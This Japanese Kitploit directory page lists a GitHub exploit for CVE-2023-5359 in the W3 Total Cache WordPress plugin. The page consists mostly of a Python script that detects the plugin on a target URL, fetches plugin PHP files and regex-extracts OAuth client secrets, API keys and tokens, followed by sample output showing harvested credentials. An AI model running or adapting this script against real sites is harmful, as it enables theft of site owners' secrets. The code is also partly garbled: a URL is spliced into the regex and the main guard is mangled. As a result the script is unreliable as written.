Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Cleartext-Storage-vulnerability-CVE-2023-5359-in-W3-Total-Cache — CVE-2023-5359 の影響を受ける 2.7.5 以下のバージョンを対象とします。 | Kitploit
ツール/GitHubGitHub/spyata123/cleartext-storage-vulnerability-cve-2023-5359-in-w3-total-cache
偵察パスワード攻撃脆弱性分析エクスプロイト情報収集ウェブセキュリティ
GitHubspyata123/cleartext-storage-vulnerability-cve-2023-5359-in-w3-total-cache

Cleartext-Storage-vulnerability-CVE-2023-5359-in-W3-Total-Cache

CVE-2023-5359 の影響を受ける 2.7.5 以下のバージョンを対象とします。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
21年前未レビュー

W3 Total Cache における平文保存の脆弱性 CVE-2023-5359

CVE-2023-5359 に脆弱なバージョン ≤2.7.5 を対象とします


import requests import re from urllib.parse import urljoin

Common paths where credentials are stored

CREDENTIAL_PATHS = [ "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php", "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php", "/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php" ]

def check_w3tc_presence(target_url): """Check if W3 Total Cache is installed""" try: response = requests.get(target_url, timeout=10) if "wp-content/plugins/w3-total-cache" in response.text: return True return False except Exception as e: print(f"Connection error: {str(e)}") return False

def extract_credentials(target_url): """Extract plaintext credentials from vulnerable files""" credentials = {}

root@kitploit:~
for path in CREDENTIAL_PATHS:
    full_url = urljoin(target_url, path)
    try:
        response = requests.get(full_url, headers={"User-Agent": "Mozilla/5.0"})
        if response.status_code == 200:
            # Search for common credential patterns
            matches = re.findall(
                r"(client_id|client_secret|api_key|oauth_token)\s*=\s*['\"](https://github.com/spyata123/cleartext-storage-vulnerability-cve-2023-5359-in-w3-total-cache/blob/main/%5Ba-zA-Z0-9-_%5D%2B)['\"]",
                response.text
            )
            if matches:
                credentials[path] = dict(matches)
    except Exception as e:
        continue
        
return credentials

def main(): target = input("Enter target URL (e.g., https://example.com): ").strip()

root@kitploit:~
if not check_w3tc_presence(target):
    print("[-] W3 Total Cache not detected")
    return

print("[+] W3 Total Cache detected. Checking for CVE-2023-5359...")

creds = extract_credentials(target)

if creds:
    print("\n[!] Sensitive credentials found:")
    for filepath, data in creds.items():
        print(f"\nFile: {filepath}")
        for key, value in data.items():
            print(f"  {key}: {value}")
else:
    print("[+] No credentials found in common locations")

if name == "main": main()

Enter target URL (e.g., https://example.com): https://vulnerable-site.com [+] W3 Total Cache detected. Checking for CVE-2023-5359...

[!] Sensitive credentials found:

File: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php client_id: GOxxxxxxxxxxxx78 client_secret: ABcdEFghIJklMNopQRstUVwxYZ

File: /wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php api_key: AiiiihIwJKLmnopkhdhsQRSTUVWXYZ-123456

ツールをダウンロード